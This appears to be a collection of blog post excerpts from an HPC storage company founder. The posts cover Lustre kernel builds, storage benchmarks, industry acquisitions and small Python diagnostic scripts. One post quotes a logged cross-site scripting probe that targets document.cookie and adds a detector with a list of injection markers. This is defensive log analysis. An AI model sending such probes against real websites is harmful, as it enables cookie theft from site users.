kernel-tools-libs-devel-3.10.0-327.13.1.el7_lustre.x86_64
lustre-osd-ldiskfs-mount-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64
kernel-headers-3.10.0-327.13.1.el7_lustre.x86_64
lustre-osd-ldiskfs-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64
kernel-tools-libs-3.10.0-327.13.1.el7_lustre.x86_64
lustre-modules-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64

This means that we can run Lustre 2.8.x atop Unison. Still pre-alpha, as I have to get an updated kernel into this, as well as update all the drivers.
Posts
It's not perfect, but we have CentOS/RHEL 7.2 and Lustre integrated into SIOS now
Lustre is infamous for its kernel specificity, and it is, sadly, quite problematic to get running on a modern kernel (3.18+). This has implications for quite a large number of things, including whole subsystems with a partial back-porting to earlier kernels … which quite often misses very critical bits for stability/performance. I am not a fan of back porting for features, I am a fan of updating kernels for features. But that is another issue that I’ve talked about in the past.
Posts
reason #31659275 not to use java
As seen on hacker news linking to an Arstechnica article, this little tidbit. This is the money quote:
I know it seems obvious now to Google and to others, but mebbe … mebbe … they should rethink building a platform in a non-open language? I’ve talked about OSS type systems in terms of business risk for well more than a decade. OSS software intrinsically changes the risk model, so that you do not have a built in dependency upon another stack that could go away at any moment.
Posts
isn't this the definition of a Ponzi scheme?
From this article at the WSJ detailing the deflation of the tech bubble in progress now.
A Ponzi scheme is like this:
Posts
Every now and then you get an eye opener
This one is while we are conditioning a Forte NVMe unit, and I am running our OS install scripts. Running dstat in a window to watch the overall system …
----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system--
usr sys idl wai hiq siq| read  writ| recv  send|  in   out | int   csw
  2   5  94   0   0   0|   0    22G| 218B  484B|   0     0 | 363k  368k
  1   4  94   0   0   0|   0    22G| 486B  632B|   0     0 | 362k  367k
  1   4  94   0   0   0|   0    22G| 628B  698B|   0     0 | 363k  368k
  2   5  92   1   0   0| 536k  110G| 802B 2024B|   0     0 | 421k  375k
  1   4  93   2   0   0|   0    22G| 360B  876B|   0     0 | 447k  377k

Wait … is that 110GB/s (2nd line from bottom, in the writ column)?
Posts
there are times
that try my patience. Usually with poorly implemented filtering tools of one form or another. The SPF mechanism is to provide an anti-spoofing system, which identifies which machines are allowed to send email in your domain name. The tools that purport to test it? Not so good. I get conflicting answers from various tools for a simple SPF record. The online tester (interactive) seems to work and show me my config is working nicely.
Posts
Of course, this means more work ahead
Our client code that pulls configuration bits from a boot server works great. But the config it pulls is distribution specific. Where we need to be is distribution/OS agnostic, and set things in a document database. Let the client convert the configuration into something OS specific. This is, to a degree, a solved problem. Indeed, etcd is just a modern reworking of what we did with the client code … using a fixed client (e.
Posts
Very preliminary RHEL7/CentOS7 SIOS base support
This is rebasing our SIOS tech atop RHEL7/CentOS7. Very early stage, pre-alpha, lots of debugger windows open … but …
[root@usn-ramboot ~]# cat /etc/redhat-release
CentOS Linux release 7.2.1511 (Core)
[root@usn-ramboot ~]# uname -r
4.4.6.scalable
[root@usn-ramboot ~]# df -h /
Filesystem      Size  Used Avail Use% Mounted on
tmpfs           8.0G  4.7G  3.4G  59% /

Dracut is giving me a few fits, but I’ve finished that side for the most part, and am now into debugging the post-pivot environment.
Posts
When spam bots attack
I’ve been fixing up a few mail servers to be more discriminating over their connections. And I’ve noted that I didn’t have any automated tooling to block the spammers. I have lots of tooling to filter and control things. So I wrote a quick log -> ban list generator. Not perfect, but it seems to work nicely. Like I don’t have enough to do this week. /sigh Meetings tomorrow starting at 8am.
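The general shape of a log -> ban list generator is small enough to sketch. This is not the tool from the post; it is a minimal illustration that assumes log lines carry the client address in square brackets and a marker word such as "reject" (the marker, the threshold, and the function name are all assumptions):

```python
import re
from collections import Counter

# Assumed format: the client IPv4 address appears in square brackets, e.g. unknown[203.0.113.7]
BRACKETED_IPV4 = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def build_ban_list(log_lines, marker="reject", threshold=3):
    """Return the sorted addresses seen on at least `threshold` lines containing `marker`."""
    counts = Counter()
    for line in log_lines:
        if marker not in line:
            continue  # only lines flagged by the mail server count against a host
        match = BRACKETED_IPV4.search(line)
        if match:
            counts[match.group(1)] += 1
    return sorted(ip for ip, seen in counts.items() if seen >= threshold)


if __name__ == "__main__":
    import sys

    # Usage: python banlist.py < /path/to/mail.log
    for address in build_ban_list(sys.stdin):
        print(address)
```

The output is one address per line, which is easy to feed into whatever firewall or access-map mechanism you already use.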
Posts
Why sticking with distro packages can be (very) bad for your security
I’ve been keeping a variety of systems up to date, updating security and other bits with zealous fervor. Security is never far from my mind, as I’ve watched bad practices being used at customers resulting in any number of things … from minor probes, through (in one case, with a grad student impacted by a windows key logger), taking down a linux cluster, but not before knocking the university temporarily off the internet.
Posts
Not-so-modern file system errors in modern file systems
On a system in heavy production use, using an underlying file system for metadata service, we see this:
kernel: EXT4-fs warning: ext4_dx_add_entry:1992: Directory index full!

Ok, where does this come from? Ext3 had a limit of 32000 directory entries per directory, unless you turned on the dir_index feature. Ext4 theoretically has no limit. Well, it’s 64000 if you don’t use dir_index. Which we do use. Really the feature you want is dir_nlink.
Posts
SIOS-metrics being updated soon with our process table sampler
I needed to look at processes on the machine I’d been spending time debugging, in terms of what was running, what the state, the allocations, the IO, etc. Something was causing a hard panic, and it seemed correlated with an application issue. I didn’t have a process space sampler, so I wrote one. Takes one sample per second right now (configurable) across the whole process space. Uses 1% CPU or so normally.
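For a sense of what a process space sampler has to do on Linux, here is a minimal sketch. It is not the SIOS-metrics code; it assumes the standard /proc/<pid>/stat layout documented in proc(5), and the function names are hypothetical:

```python
import os


def parse_stat_line(line):
    """Parse one /proc/<pid>/stat line into a few fields of interest."""
    # The command name sits in parentheses and may itself contain spaces or
    # parentheses, so split on the LAST ')' rather than on whitespace.
    left, _, right = line.rpartition(")")
    pid_text, _, comm = left.partition("(")
    fields = right.split()  # fields[0] is field 3 (state) in proc(5) numbering
    return {
        "pid": int(pid_text),
        "comm": comm,
        "state": fields[0],
        "ppid": int(fields[1]),
        "utime_ticks": int(fields[11]),  # field 14
        "stime_ticks": int(fields[12]),  # field 15
        "vsize_bytes": int(fields[20]),  # field 23
        "rss_pages": int(fields[21]),    # field 24
    }


def sample_processes(proc_root="/proc"):
    """Take one sample across every process currently visible under proc_root."""
    samples = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, "stat")) as handle:
                samples.append(parse_stat_line(handle.read()))
        except (OSError, ValueError, IndexError):
            continue  # the process exited mid-sample or the line was unreadable
    return samples
```

Calling `sample_processes()` once per second and diffing the tick counters between samples gives per-process CPU use over time.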
Posts
Caught a not-so-cool bug in a hypervisor running on a production machine
Not naming names. It’s a good product. It just gives up the ghost when you request 1.5x available memory, and the OS actually tries … tries … to fulfill the request. I thought I had set the maximum oversubscription amount to 85% of swap + physical. Yet, along came a nice spike and WHAMMO. Down the machine went. That this was a high visibility production machine, with hard uptime requirements … not so good.
Posts
Sadly we can't afford the time or people to go to BioIT world expo next week
Short handed + lots of very near term projects + many things that demand our attention == us pulling out. I wish it was otherwise, but we have limited people bandwidth, and I can’t afford 2 days doing booth duty while we have hard deliverables. /sigh Maybe 2017. We’ll see. And no, even though HPC on Wall Street is the same time, we aren’t going to that either. I like the show, but same issue with timing/people/projects.
Posts
Ways to not reach me
I’ve implemented a very strict policy for inbound phone calls. If I don’t recognize the number it goes to voicemail. If it’s important enough to call me, it’s important enough to leave me a message. If a call comes in with an unknown number, I won’t answer it. It can go through to voicemail. If it comes through with a restricted number, it only goes through to voicemail, though I am starting to think that such calls should be automatically blocked (as in never even given the opportunity to go to voicemail).
Posts
Spent the day fighting with a database that did not honor "be liberal in what you accept"
To put it bluntly, its escaping not only doesn’t match its docs, but appears to be internally inconsistent. I kept getting errors that google couldn’t really find much on, other than to suggest they were fixed bugs. I might have something to say on that. Looking forward to the next phase of this work, where we skip this db and focus on kdb+.
Posts
Not even breaking a sweat: 10GB/s write to single node Forte unit over 100Gb net #realhyperconverged #HPC #storage
TL;DR version: 10GB/s write, 10GB/s read in a single 2U unit over 100Gb network to a backing file system. This is tremendous. The system and clients are using our default tuning/config. Real hyperconvergence requires hardware that can move bits to/from storage/networking very quickly. This is that. These units are available. Now. In volume. And are very reasonably priced (starting at $1USD/GB). Contact us for more details. This is with a file system …
Posts
Massive unapologetic storage firepower part 4: On the test track with a Forte unit ... vaaaaROOOOOOMMMMMMM!!!!!
I am trying to help people conceptualize the experience. Here is a video depicting very fast, very powerful cars and their sound signatures.
This is a good start. Take one of those awesome machines, and turn off half the engine. So it is literally running with 1/2 of its power turned off. Remember this. There will be a quiz. As we flippantly noted in the video, this is face-melting performance. Had I any hair left, it would have been blown way back.
Posts
Just another day, debugging someone's installer
I like the installers that attempt (and then fail) to calculate what they need, and generate installation target names programmatically. I know … I know … it’s an attempt to reduce the level of pain for some folks, as the algorithm works for some sets of inputs. But not mine. And mine are valid. What we need is an --I_know_what_the_heck_I_am_asking_for_so_please_just_do_the_install switch. Or, I have their installer (thankfully non-terrible perl code) up in an editor to see if I can find the offending part, and then I can patch it (and send them the patch).
Posts
What a difference a CEO makes
So Microsoft will be starting to produce Linux software. This would never have happened under the previous CEO. With this change, Microsoft’s addressable market just grew fairly significantly for this product. Of course, there are ways for them to mess this up. Such as if they have features only available under windows. That would rather permanently consign this product to the dustbin of history. This said, I am hopeful that this CEO gets it, and will make sure that the changes Microsoft needs to make, are, in fact, made.
Posts
One of those days where you search for information on a problem
and find that you wrote on a mailing list almost half a decade ago about the problem, that it hasn’t been fixed. This is a little sad.
Posts
Fixed the asymmetric problem by moving to a different switch/network
Long story but it was a time sensitive POC bug. I like the switch I was using, but we needed this up ASAP. Customer was waiting. So I yanked all the 40GbE cards from the servers, put in multiport 10GbE, set up 802.3ad LAGs. Then moved to the Arista in the lab (great switch BTW). It’s been years since I set one up, so out came the manual. Read up on setting up the LAGs and port channels … I had forgotten why I liked using them so much.
Posts
Cool asymmetric network performance happened to mess up a customer benchmark
A bunch of Unison systems, a 40GbE network interconnecting them, and a bunch of client nodes on 40GbE -> 4x 10GbE links (to accommodate enough clients for the load testing). 40GbE <-> 40GbE works great. Full bandwidth, only minor oddities (single thread performance around 27Gb/s, need multiple threads to hit 40). 10GbE <-> 10GbE works great. Full bandwidth, nothing odd. 10GbE -> 40GbE works great, get about the expected bandwidth (10GbE).
Posts
Interesting ... so will they be sued for patents
Turns out the next Ubuntu is fully baking ZFS into the kernel and distributing it. This seems directly contrary to the licensing (CDDL vs GPL), and chances are some folks will be unhappy with it. The big question is, will the IP holders sue? Because if they don’t, they may actually have given up their right to sue. Or has Canonical obtained a license to distribute? This is my understanding as I am not a lawyer, so I can’t really be sure of this (and I’d recommend you ask one if you are not sure).
Posts
New tool to help visualize /proc/interrupts and info in /proc/irq/$INT/
This is a start, not ready for release yet, but already useful as a diagnostic tool. I wanted to see how my IRQs were laid out, as this has been something of a persistent problem. I’ve built some intelligence into our irqassign.pl tool, but I need a way to see where the system is investing most of its interrupts. I omit (on purpose) IRQs that have been assigned, but have generated no interrupts.
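To give a flavor of what such a tool has to parse, here is a minimal sketch (not the tool described above, and the function names are hypothetical). It assumes the usual /proc/interrupts layout: a header row of CPU names, then one row per IRQ with a label, per-CPU counts, and a description. IRQs that have never fired are skipped:

```python
def parse_interrupts(text):
    """Parse /proc/interrupts text into (cpu_names, rows), skipping idle IRQs."""
    lines = text.strip("\n").splitlines()
    cpus = lines[0].split()
    rows = {}
    for line in lines[1:]:
        label, _, rest = line.partition(":")
        tokens = rest.split()
        counts = []
        for token in tokens[: len(cpus)]:
            if not token.isdigit():
                break  # some summary rows carry fewer counts than there are CPUs
            counts.append(int(token))
        total = sum(counts)
        if total == 0:
            continue  # assigned, but has generated no interrupts
        rows[label.strip()] = {
            "per_cpu": counts,
            "total": total,
            "desc": " ".join(tokens[len(counts):]),
        }
    return cpus, rows


def busiest(rows, top=3):
    """Labels of the IRQs with the highest total interrupt counts."""
    return sorted(rows, key=lambda label: rows[label]["total"], reverse=True)[:top]


if __name__ == "__main__":
    with open("/proc/interrupts") as handle:
        cpu_names, irq_rows = parse_interrupts(handle.read())
    for label in busiest(irq_rows, top=10):
        print(label, irq_rows[label]["total"], irq_rows[label]["desc"])
```

The per-CPU counts are kept alongside the totals, so it is a short step from here to spotting an IRQ that lands entirely on one core.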
Posts
Not sufficiently caffeinated for technical work today
I just spent 30 minutes trying to figure out why the 32 bit q process would run on one machine, while the identical tree and config would fail with a license expired on my desktop (development box). Turns out one should check for an old license file in one’s home directory. /sigh I think I need to send an RFE for a ‘--low-coffee-mode’ option.
Posts
Radio Free HPC is (as usual) worth a listen
Good wrap up of last year’s trends, this week at InsideHPC Radio Free HPC podcast. We get a small mention around 10:50 or so. That’s not why it’s an especially good listen. The team arrived at many of the same conclusions we did last year, which is why we brought out Forte, and we have some additional products planned in that line for later on in the year. Basically NVM and variants, NVMe, etc.
Posts
"Unexpected" cloud storage retrieval charges, or "RTFM"
An article appeared on HN this morning. In it, the author noted that all was not well with the universe, as their backup, using Amazon’s Glacier product, wound up being quite expensive for a small backup/restore. The OP discovered some of the issues with Glacier when they began the restore (not commenting on performance, merely the costing). Basically, to lure you in, they provide very low up front costs. That is, until you try to pull the data back for some reason.
Posts
Container jutsu
Linux containers are all the rage, with Docker, rkt, lxd, etc. all in market to various degrees. You have companies like Docker, CoreOS, and Rancher all vying for mindshare, not to mention some of the plumbing bits by google and many others. I don’t think they are a fad, there is much that is good with containers, when they are done right. To see how they are done right, have a good hard long look at SmartOS.
Posts
Hard filtering of calls
I find that, over time, my cell phone number has propagated out to spammers/scammers who want to call me up to sell me something. The US national do-not-call registry hasn’t helped. The complaints I’ve filed haven’t helped. So I filter. My filtering algo looks like this:
    if (number_is_known_person_or_org(phone_number)) {
        take_call_if_possible();
    } else if (number_is_unknown(phone_number)) {
        filter_stage_2(phone_number)
    }

    function filter_stage_2(phone_number) {
        // I ignore 80% of numbers I don't know, let them go to
        // voicemail.
Posts
Nutanix files for IPO
Short story here. I am not going to pore over their S-1 form to find interesting tidbits, others will do that, and are paid to do so. They are the first of several, though I had thought that Dell would acquire them before they hit IPO. I am guessing that the combination of the price for them, plus the EMC acquisition stopped this conversation. So now Nutanix is going to IPO.
Posts
Toshiba contemplating spinning out NAND flash
This is remarkable if true, and if they follow through with it, it will change the landscape of Flash quite a bit. Right now there are 43 major flash providers, and a few smaller ones. Building flash fabs is expensive, even given the demand and process improvements, there is still quite a bit of investment required to set up a flash fab. Toshiba has some cool kit here, we’ve worked with it (and in full disclosure, we were talking about working more closely with them in the past).
Posts
Google GMail is broken, not passing emails, losing others
Yeah, the headline says it all. The reason I rolled to GMail (and am paying for it for each user and then some) for the corporate services was, well, they promised to make running email easy, painless, and I wouldn’t have to worry about email management any more. Now I have to worry about pissed off customers who are angry at me for not responding, even though I see the outbound emails in my sent folder, and from our ticketing system.
Posts
M&A: NetApp grabs SolidFire
This one has been in the rumor mill for a while. NetApp has been needing something to play well in the all flash array space, and it now has something. This said, the array space is very much on the decline, certainly with respect to dumb JBODs and smart “filer heads”. That design is being retired in favor of smarter and hyperconverged systems, such as Unison with Ceph, Forte, and related HCI (hyper converged infrastructure) systems.
Posts
Good read on market sizing for VCs and entrepreneurs
Not a how to guide, but a higher level meta discussion … about that market size discussion. See here. I’ve experienced the endless cycle of meetings over “size of market”. Not fun. These days, I have a very simple classifier with respect to investors.
    foreach investor (list_of_investors) {
        if (investor->says_yes_sends_term_sheet_and_check) {
            put_money_to_work_building_value()
        } else {
            add_to_list_of_investors_who_didnt_say_yes_and_follow_through_with_money()
        }
    }

This is pseudo code for the algo you need. Any answer which is yes is good.
Posts
Bots on Amazon?
Seeing lots of these in my web server logs:
https://scalableinformatics.com/?p=%3Cscript%3Ealert(document.cookie)%3C/script%3E which are sent there from a sentinel redirection mechanism on a different web server. A number (maybe 10 or so?) of Amazon hosts are now doing this. I am guessing this would be real darned easy to trace back to the sources. And either someone’s instance in the cloud is not under their control, or someone is paying Amazon to let them run bots.
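For anyone wanting to pick these out of their own logs, here is a minimal sketch of how such a probe could be flagged. It is not what the sentinel mechanism does; the function name and the short marker list are my own assumptions, and a real filter would want a much longer list.

```python
# Hypothetical sketch: flag request URLs whose query parameters decode to
# something that looks like a script-injection (XSS) probe.
from urllib.parse import urlsplit, parse_qsl

# Assumed marker list, purely illustrative.
SUSPICIOUS = ("<script", "javascript:", "onerror=")

def looks_like_xss_probe(url):
    """True if any percent-decoded query value contains a suspicious marker."""
    query = urlsplit(url).query
    # parse_qsl percent-decodes the values, so %3Cscript%3E becomes <script>
    for _name, value in parse_qsl(query, keep_blank_values=True):
        lowered = value.lower()
        if any(marker in lowered for marker in SUSPICIOUS):
            return True
    return False

probe = ("https://scalableinformatics.com/"
         "?p=%3Cscript%3Ealert(document.cookie)%3C/script%3E")
print(looks_like_xss_probe(probe))
print(looks_like_xss_probe("https://scalableinformatics.com/?p=123"))
```

Decoding before matching is the important bit: the raw log line never contains a literal `<script`, only the percent-encoded form.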
Posts
Watching dracut, udev, systemd, and plymouth all battle each other for nfs/ramboot
I can’t even begin to describe the complete and utter broken-ness of this mess. This doesn’t look like a systemd issue, it’s just the poor stack trying to get everything else working. But plymouth. Seriously. It should be given the old-yeller treatment. And watching udev not … settle … is … amusing. While it’s doing that, the dracut options of debug, drop to a shell, break, etc. aren’t working. This isn’t engineering at this point.
Posts
Testing a new @scalableinfo Unison #Ceph appliance node for #hpc #storage
Simple test case, no file system … using raw devices, what can I push out to all 60 drives in 128k chunks. Actually this is part of our burn-in test series, I am looking for failures/performance anomalies.
    ----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system--
    usr sys idl wai hiq siq| read  writ| recv  send|  in   out | int   csw
      0   1  95   5   0   0| 513M    0 | 480B    0 |   0     0 | 10k   20k
      4   2  94   0   0   0|   0     0 | 480B    0 |   0     0 |5238   721
      0   2  98   0   0   0|   0     0 | 480B    0 |   0     0 |4913   352
      0   2  98   0   0   0|   0     0 | 570B   90B|   0     0 |4966   613
      0   2  98   0   0   0|   0     0 | 480B    0 |   0     0 |4912   413
      0   2  98   0   0   0|   0     0 | 584B   92B|   0     0 |4965   334
      0   2  98   0   0   0|   0     0 | 480B    0 |   0     0 |4914   306
      0   2  98   0   0   0|   0     0 | 636B  147B|   0     0 |4969   483
      0   2  98   0   0   0|   0     0 | 570B    0 |   0     0 |4915   377
      8   8  50  32   0   2|7520k 8382M| 578B    0 |   0     0 | 76k  215k
      9   7  30  52   0   3|8332k   12G| 960B  132B|   0     0 | 109k  279k
     10   5  29  53   0   2|4136k   12G| 240B    0 |   0     0 | 109k  277k
     12   6  29  51   0   2|4208k   12G| 240B    0 |   0     0 | 108k  280k
     11   6  31  50   0   2|2244k   12G| 330B   90B|   0     0 | 109k  281k
     11   6  30  50   0   3|2272k   13G| 240B    0 |   0     0 | 110k  281k

Writes around 12.
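To put the write column in per-drive terms, here is a small sketch. It assumes dstat's k/M/G suffixes are powers of 1024 (my assumption, worth checking against your dstat version) and that the load is spread evenly across the 60 drives mentioned above; the helper names are hypothetical.

```python
# Hypothetical sketch: convert dstat-style fields ("8382M", "12G") to bytes
# and work out the average write rate per drive.

# Assumption: dstat suffixes are base 1024.
UNITS = {"B": 1, "k": 1024, "M": 1024**2, "G": 1024**3}

def dstat_to_bytes(field):
    """Convert a dstat field such as '12G' or '480B' to a byte count."""
    field = field.strip()
    if field[-1] in UNITS:
        return float(field[:-1]) * UNITS[field[-1]]
    return float(field)          # bare number, e.g. "0"

def per_drive_mib_s(write_field, drives):
    """Average write rate per drive in MiB/s, assuming an even spread."""
    return dstat_to_bytes(write_field) / drives / 1024**2

print(f'{per_drive_mib_s("12G", 60):.1f} MiB/s per drive')
```

Under those assumptions the steady-state 12G rows work out to a bit over 200 MiB/s per drive.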
Posts
10TB PMR drives for Unison #hpc #storage systems, think 600TB/4U unit with @BeeGFS, @Ceph, and others
WD/HGST just released details on a PMR (aka “real”, non-archive class) hard disk. You can read the specs here. We will be offering these in Unison HPC storage systems, to provide up to 600TB/4U unit, or up to 6PB per rack of 10 Unison chassis. Coupled with our 100Gb fabric, we expect to be able to drive about 8-9 GB/s per chassis. And that’s before we leverage the distributed journaling/metadata NVMe’s rear mounted on the units.
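The capacity and bandwidth figures can be sanity checked with a few lines of arithmetic. This is a sketch, not a spec sheet: the 60 drives per chassis is inferred from 600TB divided by 10TB drives, units are decimal (1PB = 1000TB), and the function names are made up.

```python
# Hypothetical sketch of the capacity and bandwidth arithmetic.

def chassis_capacity_tb(drive_tb, drives_per_chassis):
    return drive_tb * drives_per_chassis

def rack_capacity_pb(chassis_tb, chassis_per_rack):
    return chassis_tb * chassis_per_rack / 1000      # decimal PB

def line_rate_gbytes(link_gbits):
    return link_gbits / 8                            # Gb/s -> GB/s, no protocol overhead

chassis_tb = chassis_capacity_tb(10, 60)     # assumed: 60 x 10TB drives per 4U
rack_pb = rack_capacity_pb(chassis_tb, 10)   # 10 chassis per rack
line_rate = line_rate_gbytes(100)            # 100Gb fabric

print(f"{chassis_tb} TB per chassis, {rack_pb} PB per rack")
for expected in (8, 9):
    print(f"{expected} GB/s is {expected / line_rate:.0%} of {line_rate} GB/s line rate")
```

So the expected 8-9 GB/s per chassis sits at roughly two thirds to three quarters of what a single 100Gb link can carry.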
Posts
Video interview: face melting performance in #hpc #nvme #storage @scalableinfo
Oh no … we didn’t say “face melting” … did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com. You can see the video itself here on YouTube, but read Rich’s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.
Posts
There are no silver bullets, 2015 edition
In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big … uh … “data” ?) into golden nuggets of actionable data. Many of the “solutions” marketed these days are exactly like that … “add our magic bean software to your pipeline and you will gain insight faster.
Posts
A wonderful read on metrics, profiling, benchmarking
Brendan Gregg’s writings are always interesting and informative. I just saw a link on hacker news to a presentation he gave on “Broken Performance Tools”. It is wonderful, and succinctly explains many things I’ve talked about here and elsewhere, but it goes far beyond what I’ve grumbled over. One of my favorite points in there is slide 83. “Most popular benchmarks are flawed” and a pointer to a paper (easy to google for).
Posts
Massive Unapologetic Firepower part 3: Forte
Forte has uncloaked, website is being updated. You can email me (landman@scalableinformatics.com) for more info. Pictures speak louder than words. Have a look.
That is 20+ GB/s for streaming sequential IO. Then, 4kB random reads …
That is, 5+ Million IOPs. Specs include Price point for this is $50k for 48TB, $1/GB. Pre-order now, shipping in a few weeks.
Posts
Shiny #HPC #storage things at #SC15
Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison)
* 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system
* 100Gb connection to a partner/customer booth
* Forte

100Gb is awesome. The first time I ran an iperf bidirectional test, saw 20GB/s … it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.
Posts
Moving inventory out to make room for new stuff
We have a bunch of units to move out. These are from a recent POC project, and we have a new architecture project that needs all that rack space and then some … the team are building Franken-boxen clients for this project, so we have enough requestors on the network. Parts start arriving next week for that, and we really need to clear this out soon. I hate seeing good gear sitting idle on a storage shelf when it could be helping solve hard problems.
Posts
Cat peeking out of bag: Schedule of presentations and talks in our booth for SC15 is up
I mentioned previously that we have some new (shiny) things … and it looks like you’ll be able to hear about them at my talk. See the schedule for timing information. This said, please note that we have a terrific line up of people giving talks:
* Fintan Quill from Kx on kdb+ … which is an awesome market leading Big Data Time Series analytics and database tool that runs absolutely balls-out insanely fast on our architecture
* Christian Mohrbacher from Thinkparq on BeeGFS … the primary parallel file system we are leveraging for Unison parallel file system appliances
* Mark Nelson from Inktank/Red Hat on Ceph … the reliable block and object storage system that we’ve built into our Unison Object/Block Storage appliance
* Doug Eadline from Basement Supercomputing on Hadoop, and likely showing a Limulus deskside Hadoop appliance
* Phil Mucci from Minimal Metrics on optimization problems for systems and code.
Posts
Just give me a huge fast storage system, and a mighty network to deliver it by
A system in the lab. Here is a snapshot from our management GUI.
[ ](/images/unison-poc-system.png)
A couple things to note:
In the lower right corner, you can see the size of the /mnt/unison file system. This is an all flash system. No, there is no compression, nor dedup going on here. We could, but most of the use cases we are dealing with these days … this would not be a win.
Posts
Looking forward to showing off a new product at SC15
Think … pretty interesting performance … Think very … very dense … Think … there may be some benchies leaked here soon.
Posts
M&A: Huge ... WD acquires SanDisk
This is huge. Now Seagate has a relationship with Micron, Toshiba has its own disks and shares a fab with SanDisk (though I think with this acquisition, that will rapidly change). Ok … so the HD vendors are busy snapping up the Flash makers. Is Micron next? Rumors of something have been swirling for a while. Note also, SanDisk has their InfiniFlash unit. WD simply did not have storage appliances. This gets them into that space, and directly competing with the likes of all the smaller startup all flash array (AFA) vendors.
Posts
Finding needles in haystacks covered in a fallen down barn
Ok … this one was very annoying. Imagine you are trying to diagnose a system crash on a production unit. The crash is quite specific in the subsystems … being one where the interrupt handler catches an exception, and then you start piling up softirq contexts. It’s on the network side of things. You discover that the switch and the NIC are, somehow, incredibly, not quite compatible with each other. I can’t assign blame for this as I don’t know who is at fault.
Posts
M&A: EMC gobbled by Dell
Need to think how this will play out. The Register’s take is here. It seems that this will solve the “shareholder value” problem indicated by Elliott Management (e.g. they wanted more return on their investment). As part of increasing the return to shareholders, EMC had been in a cost cutting mode. Layoffs have been in process, and likely products trimmed or refocused. Once this goes through (assuming regulators won’t protest), Dell will have
Posts
The end of java in the browser
Coming soon. Mozilla is turning off NPAPI support at the end of next year. Java and java applets rely upon NPAPI to work. Needless to say, Java support in the browser is going to end. While this is good news, they are still going to allow flash. Which is less good. What is interesting about this, is that this sunsets support for many of the remote console applications that depend upon Java (for the moment) to provide KVM like capabilities.
Posts
End days must be on hand ... Perl 6 is out
see for more details. I’d love to find a valid reason to play with it, but my near term foci are going to remain our current code base in Perl/C, nodejs for a few things, Julia/R for analysis. The joke about Perl 6 shipping by Christmas is now over … as the correct response has been “what year”. Until this year it seems.
Posts
M&A: Cleversafe is snarfed up by IBM
Cleversafe was acquired by IBM. Looks like 200 people making their way over. This is huge, as now Scality is basically the last independent standing, and I am guessing they won’t be alone for long.
Posts
As the benchmark cooks
We are involved in a fairly large benchmark for a potential customer. I won’t go into many specifics, though I should note that lots of our Unison units are involved. Current architecture has 5 storage nodes (6th was temporarily removed to handle a customer issue). Each Unison node has a pair of 56GbE NICs, as well as our appliance OS, and bunches of other goodness (quite a bit of flash). Total capacity for test is of order 200TB of flash.
Posts
Inventory to sell to make room: Cadence and several Unison/JackRabbits
Very fast units, very reasonable prices. We are (again) running out of space in our lab, and really need to move this stuff out. Many of these have been demo/engineering machines for us, including the portable petabyte unit. We’ve got a Cadence box with 16TB of storage, which puts up performance numbers that other vendors would kill for …
https://twitter.com/sijoe/status/606221680533508096
and
https://twitter.com/sijoe/status/606222084587388928
We’ve got the portable petabyte unit available (albeit with less than 1 PB).
Posts
Unison Ceph beats reference architecture, including the flavor with NVMe drives
The paper is here. We focused on our product mix and the rough comparables in the report. Our units are immediately available as well, preloaded/preconfigured with Ceph. The takeaway is this:
[ ](https://scalableinformatics.com/assets/documents/Unison-Ceph-Performance.pdf)
What’s really interesting in this is that the 36+2 reference architecture makes use of 2x NVMe drives. And as you can see, they really don’t help much in the tests. This is not to say NVMe is bad; it’s not.
Posts
Nominate your favorite HPC product and company for a readers choice award
Please go here and nominate! Last year, our customer Lucera won best in Financial Services. We built the vast majority of their infrastructure, so we like to think we contributed in some manner to their success. This year, please don’t hesitate to nominate us (or second/third/etc.) for Best HPC Storage Product or Technology for the Scalable Informatics Unison product, or whatever you’d like. In addition to the nomination for Unison in storage, I put in nominations for Cadence in Financial Services, and in Data Intensive computing.
Posts
M&A: Seagate snarfs up DotHill
The Register reports this morning, that Seagate has acquired DotHill. DotHill makes arrays and their kit is resold and rebadged by many. In general the array market (high end) is in a decline, and doesn’t show signs of turning around (ever). The low and mid market, including some of the cloud bits is growing. I am not sure about the OCP stuff, but the low end bits are where we are seeing 4, 8, and 12 drive arrays show up as completely commoditized gear.
Posts
IPO: Pure Storage files
Not really an HPC/Big Data play (yet). But they have filed. The traditional array market is in a decline, and depending upon how you view it, it’s either merely a steep decline, or an out-and-out death spiral. The tier1 vendors are defending a shrinking turf against aggressive smaller and more focused players. Moreover, flash is set to overtake disk in terms of lower cost to deploy in very short order. This plays well for folks like Pure and a few others, though the market they are playing in is in decline.
Posts
rebuilding our kernel build system for fun and profit
No, really mostly to clean up an accumulation of technical debt that was really bugging the heck out of me. I like Makefiles and I cannot lie. So I like encoding lots of things in them. But it wound up hardwiring a number of things that shouldn’t have been hardwired. And made the builds brittle. When you have 2 released/supported kernels, and a handful of experimental kernels, it gets hard making changes that will be properly reflected across the set.
Posts
Drama at Violin Memory
Violin has had a rather tumultuous time in market. Post IPO, they’ve not had a great time selling. They have an interesting product, but with SanDisk coming out with their kit, and many others in the competitive flash array space, this can’t be a fun time for them. They don’t have a large installed base to protect, and their competitors are numerous and fairly well funded. Add to the mix that, as a post-IPO public company, they no longer have the luxury of not hitting targets … they will get slaughtered in the market.
Posts
Build debugging thoughts
Our toolchain that we use for providing up to date and bug-reduced versions of various tools for our appliances has a number of internal testing suites. These suites do a pretty good job of exercising code. When you build Perl, and the internal modules and tools, tests are done right then and there, as part of the module installation. Sadly not many languages do this yet, I think Julia, R, and a few others might.
Posts
Insanely awesome project and product
